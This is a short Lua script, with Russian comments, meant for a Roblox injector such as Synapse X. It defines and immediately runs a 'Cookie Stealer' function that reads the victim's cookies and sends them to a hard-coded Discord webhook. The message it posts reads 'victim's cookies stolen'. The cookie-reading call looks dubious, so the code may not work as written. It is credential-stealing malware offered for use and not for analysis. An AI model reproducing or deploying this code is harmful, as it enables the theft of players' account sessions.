-- Скрипт для инжектора Roblox (например, Synapse X)
local request = (syn and syn.request) or (http and http.request) or request
local webhook = "https://discord.com/api/webhooks/1412806355978424432/tFTkXdwAIfaivqjclXaBFqvP5XFzX2T2M1NtiGrI_gxvfWJUgnBP75Yz0Ugb1L0FYh-N"

local function stealCookies()
    local cookies = game:GetService("Players").LocalPlayer:GetCookies().value
    local data = {
        ["content"] = "🕵️ Куки жертвы украдены:",
        ["embeds"] = {{
            ["title"] = "Cookie Stealer",
            ["description"] = "```" .. tostring(cookies) .. "```",
            ["color"] = 16711680
        }}
    }
    request({Url = webhook, Method = "POST", Headers = {["Content-Type"]="application/json"}, Body = game:GetService("HttpService"):JSONEncode(data)})
end

stealCookies()
